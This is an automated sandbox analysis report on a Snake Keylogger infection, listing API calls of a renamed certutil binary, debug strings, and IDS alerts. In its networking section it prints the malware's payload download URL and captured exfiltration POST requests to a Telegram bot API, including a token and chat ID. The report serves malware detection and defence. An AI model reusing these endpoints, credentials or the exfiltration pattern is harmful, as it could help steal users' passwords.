              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF792DCA1F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF792DF6214
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF792D7A1E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D321A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF792D321A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF792DB61AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF792D5417C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D76194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D76194
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF613C CryptDecodeObjectEx,7_2_00007FF792DF613C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D30300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF792D30300
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF792DFA2E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF792DC8298
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF792DB2278
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D66280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D66280
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DBE274
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF792DC8814
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D907F4 BCryptDestroyKey,#205,#357,7_2_00007FF792D907F4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D7C7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D827BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D827BC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DA07D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D907A4 BCryptDestroyHash,#205,#357,7_2_00007FF792D907A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792CF67CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF792D90740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DCA740
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82724 CryptDecodeObject,GetLastError,#357,7_2_00007FF792D82724
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DC4914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF792D7E914
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D908EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF792D908EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF792D0A8CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF792DFE8B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF792D90844
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D16824 CryptHashCertificate,GetLastError,#357,7_2_00007FF792D16824
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D18600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF792D18600
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D525E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF792D525E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF792D1C5D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D965B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF792D965B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF792D8E57C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF792DCA590
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF792DFA58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC66D8 NCryptFreeObject,#360,7_2_00007FF792DC66D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF792DB86D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D326E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF792D326E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D64694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF792D64694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D26694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF792D26694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6654 NCryptGetProperty,#360,7_2_00007FF792DC6654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF792D5A654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D20630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D20630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF792DC0BF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D92BC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF792D1CB98
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC0B9C CryptHashData,GetLastError,#357,7_2_00007FF792DC0B9C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF792DBCBB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF792D90B80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF792DFEB38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF792D82CF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF792D92CFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF792D90D14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF792DC6CE0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF792DE8CF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D54CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF792D54CC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D84CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792D84CA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF792D9ACAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF792D92C80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF792DD4C80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6C88 NCryptEnumAlgorithms,#360,7_2_00007FF792DC6C88
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF792DC8C58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF792D90C3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF792CF6C4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF792D2CC24
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6C30 NCryptOpenStorageProvider,#360,7_2_00007FF792DC6C30
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF792D7AA00

              Compliance

              Source: C:\Users\Public\Libraries\xzeheenC.pif Unpacked PE file: 16.2.xzeheenC.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\xzeheenC.pif Unpacked PE file: 22.2.xzeheenC.pif.400000.0.unpack
              Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 54.231.224.185:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49716 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49720 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49931 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: _.pdb source: xzeheenC.pif, 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1588311534.0000000029952000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1742091076.0000000030AE6000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2756654724.0000000030ADD000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1811611837.0000000020765000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.00000000217D2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.0000000021801000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.000000000057D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000736000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr

              Networking

              Source: Network traffic Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49746 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49721 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49734 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49723 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49717 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49728 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49712 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49735 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49722 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49724 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49758 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49714 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49725 -> 149.154.167.220:443
              Source: Malware configuration extractor, URLs: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj
              Source: unknown, DNS query: name: api.telegram.org
              Source: Yara match, File source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\Public\Libraries\spoolsv.COM, Code function: 10_2_0290E2F8 InternetCheckConnectionA, 10_2_0290E2F8
              Source: global traffic, HTTP traffic detected:
                POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                Content-Type: multipart/form-data; boundary=------------------------8dd1f4f091cadca
                Host: api.telegram.org
                Content-Length: 535
                Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1fec91a656cdHost: api.telegram.orgContent-Length: 535
